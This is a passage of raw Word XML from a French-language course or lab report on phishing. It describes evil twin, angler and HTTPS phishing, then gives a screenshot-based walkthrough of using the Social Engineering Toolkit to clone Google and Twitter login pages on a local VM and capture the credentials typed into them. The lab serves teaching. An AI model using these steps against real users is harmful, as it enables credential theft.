        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_399t3t9cta9j" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>7 - L’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>twin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve"> phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46951750" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AC223D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un pirate met en place un faux point d’accès WIFI. Au lieu de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cliquez</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sur un réseau WIFI légitime, vous cliquez sur le faut point d’accès et, une fois que vous l’avez fait, tout ce que vous partagez sur le réseau passe par un serveur contrôlé par l’attaquant pourra voir tout ce que vous faites, y compris lorsque vous vous connectez à votre compte et saisissez des infos sensibles </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA779E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BBD319" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049E32BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_mjon9n6qjewa" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t xml:space="preserve">8 - L’Angler phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D292B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="47F12C6A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Un attaquant se fait passer pour un représentant d’un service clientèle (CSR) dans le but de vous convaincre de divulguer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vos infos perso</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>. Comme vous croyez qu’il s’agit d’un service légitime, vous donnez vos infos sans hésiter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A41B787" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_758hsct0kbtl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="162A616E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_wqbzkcb1p2ck" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6FA8DC"/>
        </w:rPr>
        <w:t>9 - Le HTTPS phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E872F4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5A8EEB1B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un pirate crée un site falsifié qui utilise le protocole de transfert hypertexte sécurisé. La plupart des sites affichent HTTPS dans la barre d’URL, sous forme d’un cadenas. HTTPS est un protocole standard destiné à garantir la sécurité de la connexion à un site, car il crypte le trafic entre un navigateur et un site. Cependant, de nombreux pirates abusent du protocole HTTPS pour vous amener à faire confiance à des sites falsifiés. Ces derniers ne sont pas sécurisés, mais un faux HTTPS donne l'impression qu’ils le sont. De ce </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fait ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vous êtes plus enclin à saisir vos infos sur le site falsifié. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE5D60" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B0FB4C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A58120" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_gmtwa56qw39t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 3 - Les outils de Phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3057A5C2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2D7EC3FE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7331A9CF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Social engineering Toolkit (SET), en français “boite à outils pour l’ingénierie sociale” est un logiciel développé par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrsutedSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et écrit par David </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Kennedy  en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> python. Il est open-source et multiplateforme et propose un choix de fonctions permettant diverses attaques basées sur l’hameçonnage informatique. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C4F6D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318FF1B9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t xml:space="preserve"> On </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t>vas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t xml:space="preserve"> réaliser un hameçonnage sur le site de Google et de Twitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3919F9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA66881" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>=&gt; Démarrer le service apache : service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04113A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3DD56CD4" wp14:editId="3FBCCF3E">
            <wp:extent cx="5014913" cy="3323837"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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014913" cy="3323837"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915BB5B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>allez sur l’outils set social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1715E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="49674947" wp14:editId="1A72F4C6">
            <wp:extent cx="4691063" cy="3183797"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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4691063" cy="3183797"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526FEC9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>On sélectionne le numéro 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5409447A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0294E5E6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="47250A73" wp14:editId="730EB24B">
            <wp:extent cx="4862513" cy="4077419"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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4862513" cy="4077419"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25445969" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A26D51B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECA53FC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4304C8F5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299E33C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353410F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297A85E7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="15DAE341" wp14:editId="094CFFC5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-619124</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7106908" cy="2467349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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7106908" cy="2467349"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FCA08" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A669F3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563B6F56" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412B0AD6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4B905B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEDBA05" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170605D2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D19FF03" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4958F8FF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75551F7B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA5B183" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3897C3EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31447D65" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8B4FCE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A814996" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF0B85C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="69FCE328" wp14:editId="25A37762">
            <wp:extent cx="5731200" cy="172720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731200" cy="1727200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD9C74" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C7F1DE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1296C8CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve">Lancer le navigateur </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA199AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0B27BC21" wp14:editId="0E68E315">
            <wp:extent cx="5731200" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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5731200" cy="2755900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90F601" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033A901C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B72C81" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263342C2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1794DAA1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>vas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>l’ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> de votre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> est on rentre des id mdp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44941746" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="68DC4CBB" wp14:editId="6678934C">
            <wp:extent cx="4691063" cy="4153383"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4691063" cy="4153383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DA888" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E47238D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve">on voit sur le terminal les identifiant le mot de passe c’est du phishing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3AB7C3FE" wp14:editId="36E6CB01">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-333374</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6483675" cy="4666281"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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6483675" cy="4666281"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2BB044" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0915F2FA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A17253B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FC1C0D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CD13D5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647ECEE8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
